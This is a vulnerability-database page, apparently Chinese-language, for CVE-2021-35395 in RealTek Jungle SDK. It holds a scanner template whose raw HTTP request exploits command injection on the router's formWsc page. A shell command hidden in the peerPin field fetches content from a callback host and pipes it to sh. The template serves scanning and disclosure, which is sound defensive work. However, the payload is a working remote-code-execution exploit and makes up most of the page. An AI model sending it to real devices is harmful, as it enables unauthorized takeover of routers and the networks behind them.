CVE-2021-35395: RealTek Jungle SDK - Arbitrary Command Injection

日期: 2025-08-01 | 影响软件: RealTek Jungle SDK | POC: 已公开

漏洞描述

There is a command injection vulnerability on the "formWsc" page of the management interface. Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.

PoC代码[已公开]

id: CVE-2021-35395

info:
  name: RealTek Jungle SDK - Arbitrary Command Injection
  author: king-alexander
  severity: critical
  description: |
    There is a command injection vulnerability on the "formWsc" page of the management interface. Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.
  remediation: Apply the latest security patches or updates provided by RealTek to fix the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35395
    - https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities
    - https://www.realtek.com/en/cu-1-en/cu-1-taiwan-en
    - https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf
    - https://github.com/Knighthana/YABWF
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-35395
    epss-score: 0.93663
    epss-percentile: 0.99839
    cpe: cpe:2.3:a:realtek:realtek_jungle_sdk:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: realtek
    product: realtek_jungle_sdk
  tags: cve2021,cve,realtek,rce,kev

http:
  - raw:
      - |
        POST /goform/formWsc HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 4a0a00473045022100cef4dd16aabcad2d8f213af5e73b635b877c1c0f01f2d9befc14975d1468b6b002207402759e25b6a4fdffe150acf05d5fab70bb852d35a2a477c8debd9d2b67cbd0:922c64590222798bb761d5b6d8e72950

相关漏洞推荐